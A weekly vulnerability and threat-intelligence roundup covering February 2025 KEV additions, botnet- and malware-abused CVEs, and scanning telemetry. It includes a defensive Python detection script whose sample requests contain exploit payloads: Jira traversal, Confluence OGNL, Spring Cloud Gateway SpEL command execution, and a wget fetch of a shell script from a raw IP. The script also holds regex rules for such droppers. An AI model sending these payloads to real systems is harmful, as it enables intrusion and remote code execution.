Weekly Cybersecurity Roundup: CISA KEV Additions & Emerging Threats

February 7, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

February kicked off chaotically, with the CISA KEV catalog expanding by 10 vulnerabilities, underscoring the ongoing challenge of addressing both emerging and long-standing flaws. Two of the additions affect Microsoft products, while legacy yet unpatched flaws remain prime targets, including two seven-year-old vulnerabilities in Paessler PRTG Network Monitor and two five-year-old flaws in Sophos products.

Meanwhile, botnets remain an active threat: EnemyBot and Sysrv-K exploit a weakness in Spring Cloud Gateway, while Mozi, Androxgh0st, Tsunami, N3Cr0m0rPh and Sysrv focus their attacks on Atlassian Jira and Confluence.

Cybercriminal groups are intensifying their tactics, with Russian actors exploiting a zero-day in 7-Zip to distribute SmokeLoader, while XE Group targets zero-day vulnerabilities in VeraCore to establish persistence and execute arbitrary commands.

With threat actors relentlessly adapting, unpatched vulnerabilities remain prime targets, making swift mitigation and proactive defence more critical than ever.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.

CVE-2025-0411

A Mark-of-the-Web (MotW) bypass vulnerability in 7-Zip, affecting versions prior to 24.09, enables remote attackers to execute arbitrary code with the privileges of the current user when a victim extracts and opens a crafted archive: 7-Zip did not propagate the MotW (the Zone.Identifier stream) to files extracted from a nested archive, so Windows protections such as SmartScreen are not applied to them. This high-severity zero-day, with a CVSS score of 7.0, has a public proof-of-concept (PoC) and was recently added to CISA's Known Exploited Vulnerabilities (KEV) catalog.

CVE-2025-0890

A default-credentials vulnerability in Zyxel CPE devices, rated critical with a CVSS score of 9.8, poses a severe security risk. Zyxel has confirmed that the affected products have reached End-of-Life and will not receive updates or support, so replacing the devices, not patching them, is the remediation. According to VulnCheck, this vulnerability is being actively exploited alongside CVE-2024-40891, a command injection reachable over Telnet, enabling unauthenticated code execution.

CVE-2024-21413

An improper input validation vulnerability in Microsoft Outlook, rated critical with a CVSS score of 9.8 and known as MonikerLink, allows attackers to bypass Office Protected View with a crafted file:// hyperlink, so that the linked document opens in editing mode instead of protected mode. With a proof-of-concept (PoC) publicly available, the risk of exploitation remains high. Microsoft patched the flaw in February 2024, and it was recently added to the CISA KEV catalog.

CVE-2024-29059

An information disclosure vulnerability in the Microsoft .NET Framework exposes sensitive data, and a proof-of-concept is already public, highlighting the potential for exploitation. Microsoft released a security update in March 2024 to address the issue. This high-severity vulnerability has recently been added to the CISA KEV catalog, underscoring the importance of applying that update.

CVE-2024-45195

A forced browsing vulnerability in Apache OFBiz allows remote attackers to gain unauthorized access. According to Rapid7, the flaw is a bypass of the patches for CVE-2024-32113, CVE-2024-36104 and CVE-2024-38856, all of which stem from the same underlying weakness: the request URI the controller authorizes and the view it ultimately renders can be desynchronized. The Apache OFBiz team fixed the issue in version 18.12.16, and due to active exploitation it has been included in the CISA KEV catalog.

CVE-2024-53104

An out-of-bounds write vulnerability in the uvcvideo (USB Video Class) driver of the Linux kernel can lead to memory corruption. Google has acknowledged that the flaw "may be under limited, targeted exploitation" but has not provided details of the exploitation. Addressed in the February 2025 Android security update, this zero-day has been added to the CISA KEV catalog on the basis of that exploitation evidence rather than its severity, which is high (CVSS 7.8), not critical.

CVE-2022-23748

A process control vulnerability in Dante Discovery, rated high with a CVSS score of 7.8, allows a DLL sideloading attack through mDNSResponder.exe, enabling local attackers to execute arbitrary code via the Dante Application Library. Third-party products using Dante Application Library for Windows v1.2.0 and earlier are affected. An updated mDNSResponder.exe v1.3.2 is available as part of Dante Application Library for Windows v1.2.1 and as a standalone security patch for earlier versions; because the vulnerable binary ships embedded in third-party products, each vendor's build has to be checked and updated separately. The vulnerability was recently added to the CISA KEV catalog.

CVE-2020-15069

A buffer overflow vulnerability in Sophos XG Firewall, disclosed five years ago, allows remote code execution through the "HTTP/S bookmark" feature. Rated critical with a CVSS score of 9.8, the flaw poses a severe security risk, especially with a proof-of-concept (PoC) available. A hotfix (HF062020.1) was released for all firewalls running v17.x to address the issue. The vulnerability was recently added to the CISA KEV catalog.

CVE-2020-29574

An SQL injection vulnerability in the WebAdmin interface of Sophos CyberoamOS (CROS) allows unauthenticated attackers to execute arbitrary SQL statements remotely. This critical flaw, with a CVSS score of 9.8, has persisted for over five years in End-of-Life (EOL) products that no longer receive security updates or support. It was recently added to the CISA KEV catalog.

CVE-2018-9276  

An OS command injection vulnerability in Paessler PRTG Network Monitor affects versions prior to 18.2.39. This high-severity flaw arises from malformed parameters injected during sensor or notification management and lets an attacker with administrative access to the PRTG System Administrator web console execute arbitrary commands on the server. Combined with CVE-2018-19410 below, which hands an unauthenticated attacker an administrator account, it forms an unauthenticated remote code execution chain. With its addition to the CISA KEV catalog, timely updates are essential to avoid exploitation.

CVE-2018-19410

A local file inclusion vulnerability in Paessler PRTG Network Monitor affects versions prior to 18.2.40.1683. This critical flaw, with a CVSS score of 9.8, lets a remote unauthenticated attacker include internal API endpoints through a crafted request to the login page and thereby create a user with read-write (including administrator) privileges. Paessler addressed the issue in April 2018 with the release of PRTG version 18.2.41.1652. The vulnerability was recently added to the CISA KEV catalog.
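The KEV additions above are only actionable once they are joined against what is actually installed. The following added example (not code from the page or from CISA) does that join: it reads a subset of the real CISA KEV JSON schema (cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse), compares installed versions against the first fixed release quoted in the summaries above, and orders the exposures by remediation due date. The KEV entries, their dates, the inventory hosts and their versions are all constructed for illustration; KEV itself carries no version data, so the FIXED_VERSIONS mapping is a local assumption maintained from vendor advisories.

```python
from datetime import date

# Constructed subset of the CISA KEV JSON feed (real field names, illustrative
# dateAdded/dueDate values) carrying some of this week's additions.
KEV_SAMPLE = {
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2025-0411", "vendorProject": "7-Zip", "product": "7-Zip",
         "dateAdded": "2025-02-06", "dueDate": "2025-02-27",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2024-45195", "vendorProject": "Apache", "product": "OFBiz",
         "dateAdded": "2025-02-04", "dueDate": "2025-02-25",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2018-9276", "vendorProject": "Paessler",
         "product": "PRTG Network Monitor", "dateAdded": "2025-02-04",
         "dueDate": "2025-02-25", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2018-19410", "vendorProject": "Paessler",
         "product": "PRTG Network Monitor", "dateAdded": "2025-02-04",
         "dueDate": "2025-02-25", "knownRansomwareCampaignUse": "Unknown"},
    ],
}

# First fixed version per CVE, taken from the vendor advisories summarised above.
# KEV carries no version data, so this mapping is maintained locally (assumption).
FIXED_VERSIONS = {
    "CVE-2025-0411": "24.09",
    "CVE-2024-45195": "18.12.16",
    "CVE-2018-9276": "18.2.39",
    "CVE-2018-19410": "18.2.40.1683",
}

# Constructed software inventory; hostnames and versions are hypothetical.
INVENTORY = [
    {"host": "ws-01", "product": "7-Zip", "version": "24.08"},
    {"host": "erp-01", "product": "Apache OFBiz", "version": "18.12.16"},
    {"host": "mon-01", "product": "PRTG Network Monitor", "version": "18.2.38"},
    {"host": "mon-02", "product": "PRTG Network Monitor", "version": "18.2.39"},
]


def parse_version(text):
    """Turn '18.2.40.1683' into (18, 2, 40, 1683). Tuples compare element by
    element, and a shorter tuple sorts before a longer one sharing its prefix."""
    return tuple(int(part) for part in text.strip().split("."))


def find_exposures(kev, inventory, fixed_versions, today_iso):
    """Join KEV entries against the inventory and return hosts still running a
    version below the first fixed release, ordered by remediation due date."""
    today = date.fromisoformat(today_iso)
    exposures = []
    for entry in kev["vulnerabilities"]:
        fixed = fixed_versions.get(entry["cveID"])
        if fixed is None:
            continue  # no version data for this CVE: triage it manually
        for item in inventory:
            if entry["product"].lower() not in item["product"].lower():
                continue
            if parse_version(item["version"]) < parse_version(fixed):
                due = date.fromisoformat(entry["dueDate"])
                exposures.append({
                    "host": item["host"],
                    "cveID": entry["cveID"],
                    "installed": item["version"],
                    "fixed": fixed,
                    "dueDate": entry["dueDate"],
                    "days_left": (due - today).days,
                })
    return sorted(exposures, key=lambda e: (e["dueDate"], e["host"]))


if __name__ == "__main__":
    for e in find_exposures(KEV_SAMPLE, INVENTORY, FIXED_VERSIONS, "2025-02-07"):
        print(f'{e["host"]:8} {e["cveID"]:15} {e["installed"]} < {e["fixed"]} '
              f'due {e["dueDate"]} ({e["days_left"]} days left)')
```

Note how the two PRTG entries fall out differently: a host on 18.2.39 is already past the fix for CVE-2018-9276 but still below 18.2.40.1683, so it remains exposed to CVE-2018-19410 alone. Comparing numeric tuples rather than strings is what makes "18.2.39" sort below "18.2.40.1683" correctly.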

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

CVE | Product | Severity | Title | Exploited in the wild | CISA KEV
CVE-2024-8503 | VICIdial | Critical | SQL injection vulnerability in VICIdial 2.14-917a leads to sensitive information disclosure | False | False
CVE-2024-47176 | CUPS | Medium | Improper input validation vulnerability in OpenPrinting CUPS cups-browsed through 2.0.1 leads to remote code execution | True | False
CVE-2024-38856 | Apache OFBiz | High | Incorrect authorization vulnerability in Apache OFBiz before 18.12.15 leads to remote code execution | True | True
CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True
CVE-2024-29973 | Zyxel devices | Critical | Command injection vulnerability in the "setCookie" parameter of Zyxel NAS326 and NAS542 devices | True | False
CVE-2024-27564 | pictureproxy.php file | Medium | Server-side request forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter | False | False
CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication bypass using an alternate path or channel in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure | True | True
CVE-2023-23752 | Joomla | Medium | Improper access control vulnerability in Joomla! | True | True
CVE-2023-26801 | LB-LINK | Critical | Command injection vulnerability in LB-LINK devices | True | False
CVE-2023-38646 | Metabase open source and Enterprise | Critical | Remote code execution vulnerability in Metabase open source and Metabase Enterprise | True | False
CVE-2022-41040 | Microsoft Exchange Server | High | Server-side request forgery vulnerability in Microsoft Exchange Server | True | True
CVE-2022-47945 | ThinkPHP Framework | Critical | Path traversal vulnerability in ThinkPHP Framework leads to arbitrary code execution | False | False

Vulnerabilities abused by Botnet

This section lists vulnerabilities exploited by botnets, including recent CVEs logged in MISP, whose observed payloads are suggestive of botnet activity, such as wget invocations that fetch a second stage from a raw IP address.

Vulnerability | Product | Title | Exploit | Abused by botnet
CVE-2022-22947 | Spring Cloud Gateway | Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-26086 | Atlassian Jira Server and Data Center | Path traversal vulnerability in Atlassian Jira Server and Data Center leads to read of data files in the /WEB-INF/web.xml endpoint | True | Mozi, Androxgh0st
CVE-2021-26084 | Atlassian Confluence Server and Data Center | OGNL injection vulnerability in Confluence Server and Data Center leads to arbitrary code execution | True | Tsunami, N3Cr0m0rPh, Sysrv
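The botnet table above and the sensor table before it both describe request patterns that a defender can match in web server or sensor telemetry. The following added example (not code from the page, from Loginsoft or from any of the named projects) runs a small rule set over constructed request records for the three botnet CVEs plus the wget-to-raw-IP dropper heuristic the section mentions. The request records, the source addresses and the rule thresholds are all illustrative assumptions; the paths follow the public exploit write-ups for each CVE (the Jira /s/.../_/;/WEB-INF/ traversal, the Confluence queryString OGNL marker, and the Spring Cloud Gateway actuator route carrying a SpEL #{...} filter followed by a refresh). Note that the Confluence and Spring payloads live in the POST body, so this only works on telemetry that captures bodies, not on a plain access log.

```python
import re
from urllib.parse import unquote

# Constructed request records in the shape of sensor telemetry (source IP,
# method, path, body). They are illustrative, not captures from the page's
# sensors; the paths follow the public exploit write-ups for each CVE.
SAMPLE_REQUESTS = [
    {"src": "198.51.100.10", "method": "GET",
     "path": "/s/abc123/_/;/WEB-INF/web.xml", "body": ""},
    {"src": "198.51.100.11", "method": "POST",
     "path": "/pages/createpage-entervariables.action?SpaceKey=x",
     "body": "queryString=%5Cu0027%2B%7BClass.forName%28%5Cu0027javax.script."
             "ScriptEngineManager%5Cu0027%29%7D%2B%5Cu0027"},
    {"src": "198.51.100.12", "method": "POST",
     "path": "/actuator/gateway/routes/probe",
     "body": '{"id":"probe","filters":[{"name":"AddResponseHeader","args":'
             '{"name":"Result","value":"#{T(java.lang.Runtime).getRuntime()'
             '.exec(\\"id\\")}"}}],"uri":"http://127.0.0.1"}'},
    {"src": "198.51.100.12", "method": "POST",
     "path": "/actuator/gateway/refresh", "body": ""},
    {"src": "198.51.100.13", "method": "GET",
     "path": "/cgi-bin/luci?cmd=wget%20http%3A%2F%2F203.0.113.9%2Fbot.sh"
             "%20-O%20%2Ftmp%2Fb.sh", "body": ""},
    {"src": "198.51.100.14", "method": "GET", "path": "/index.html", "body": ""},
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"

# Each rule: (identifier, description, predicate over a normalized record).
RULES = [
    ("CVE-2021-26086", "Jira path traversal to /WEB-INF/",
     lambda r: r["method"] == "GET"
     and re.search(r"^/s/[^?\s]*/_/;?/WEB-INF/", r["dpath"]) is not None),
    ("CVE-2021-26084", "Confluence OGNL injection in queryString",
     lambda r: r["dpath"].startswith("/pages/") and ".action" in r["dpath"]
     and "queryString=" in r["dbody"]
     and ("\\u0027+{" in r["dbody"] or "Class.forName" in r["dbody"])),
    ("CVE-2022-22947", "Spring Cloud Gateway SpEL expression in a route filter",
     lambda r: r["method"] == "POST"
     and r["dpath"].startswith("/actuator/gateway/routes/")
     and "#{" in r["dbody"]),
    ("BOTNET-DROPPER", "wget/curl fetching a payload from a raw IPv4 address",
     lambda r: re.search(r"\b(?:wget|curl)\b.*?https?://" + IPV4, r["dtext"])
     is not None),
]


def normalize(req):
    """Percent-decode path and body once so rules match on plain text. Scanners
    sometimes double-encode; decode a second time if that is seen in the wild."""
    dpath, dbody = unquote(req["path"]), unquote(req["body"])
    return {**req, "dpath": dpath, "dbody": dbody, "dtext": dpath + " " + dbody}


def detect(requests):
    """Return (src, rule_id, description) findings for every matching request."""
    findings, spel_sources = [], set()
    for req in requests:
        r = normalize(req)
        for rule_id, desc, pred in RULES:
            if pred(r):
                findings.append((r["src"], rule_id, desc))
                if rule_id == "CVE-2022-22947":
                    spel_sources.add(r["src"])
    # A planted SpEL route only executes once the attacker refreshes the route
    # table, so a refresh from a source that just added a route is the trigger.
    for req in requests:
        if (req["src"] in spel_sources and req["method"] == "POST"
                and unquote(req["path"]) == "/actuator/gateway/refresh"):
            findings.append((req["src"], "CVE-2022-22947",
                             "route refresh (exploit trigger)"))
    return findings


if __name__ == "__main__":
    for src, rule_id, desc in detect(SAMPLE_REQUESTS):
        print(f"{src:15} {rule_id:16} {desc}")
```

The dropper rule is deliberately generic: it keys on the behaviour the section describes (a download tool pointed at a bare IP rather than a hostname) and so also catches the CVE-2023-26801-style command injections in the sensor table, which is why it is worth keeping alongside the CVE-specific rules.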

Vulnerabilities Abused by Malware

We proactively monitor vulnerabilities that are targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2025-0411

The Trend Micro Zero Day Initiative (ZDI) threat hunting team discovered this zero-day vulnerability in the 7-Zip archiver being actively exploited in the wild to deploy the SmokeLoader malware. Russian cybercrime groups are leveraging the flaw to target governmental and non-governmental organizations in Ukraine, likely for cyberespionage amid the ongoing Russo-Ukrainian conflict. The attack chain uses compromised email accounts to deliver a doubly nested archive whose inner file names use homoglyph characters to pass as documents; because the inner archive's contents lose the Mark-of-the-Web, the payload runs without the usual Windows warning.

CVE-2025-25181 and CVE-2024-57968

Cybersecurity researchers from Intezer and Solis Security have uncovered a significant shift in tactics by XE Group, a cybercriminal organization active since at least 2013. Previously known for credit card skimming and supply chain attacks, the group has evolved into a more sophisticated threat actor that now exploits zero-day vulnerabilities to infiltrate organizations. In 2024, XE Group leveraged two such flaws in Advantive VeraCore, CVE-2025-25181 and CVE-2024-57968, to deploy webshells, maintain unauthorized access and execute arbitrary commands on compromised systems.

Vulnerability | Severity | Title | Patch | Targeted by malware | OSS
CVE-2025-0411 | High | Mark-of-the-Web bypass vulnerability in 7-Zip | Yes | SmokeLoader | False
CVE-2025-25181 | Medium | SQL injection vulnerability in Advantive VeraCore | No | XE Group | False
CVE-2024-57968 | Critical | Upload validation vulnerability in Advantive VeraCore | No | XE Group | False

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities disclosed, and potentially exploited, before their official inclusion in the National Vulnerability Database (NVD). The LOVI platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.

CVE-ID | Type of vulnerability | Product
CVE-2025-0899 | Use-after-free | PDF-XChange Editor
CVE-2025-1044 | Authentication bypass | Logsign Unified SecOps Platform
CVE-2025-1052 | Heap-based buffer overflow | Mintty
CVE-2025-24387 | Cross-site request forgery | OTRS Application Server
CVE-2024-9523 | Local privilege escalation | Avira Prime

External References

  1. https://www.cisa.gov/news-events/alerts/2025/02/05/cisa-adds-one-known-exploited-vulnerability-catalog
  2. https://www.cisa.gov/news-events/alerts/2025/02/06/cisa-adds-five-known-exploited-vulnerabilities-catalog
  3. https://www.cisa.gov/news-events/alerts/2025/02/04/cisa-adds-four-known-exploited-vulnerabilities-catalog
  4. https://intezer.com/blog/research/xe-group-exploiting-zero-days/
  5. https://www.trendmicro.com/en_us/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html
  6. https://vulncheck.com/blog/zyxel-telnet-vulns
  7. https://source.android.com/docs/security/bulletin/2025-02-01
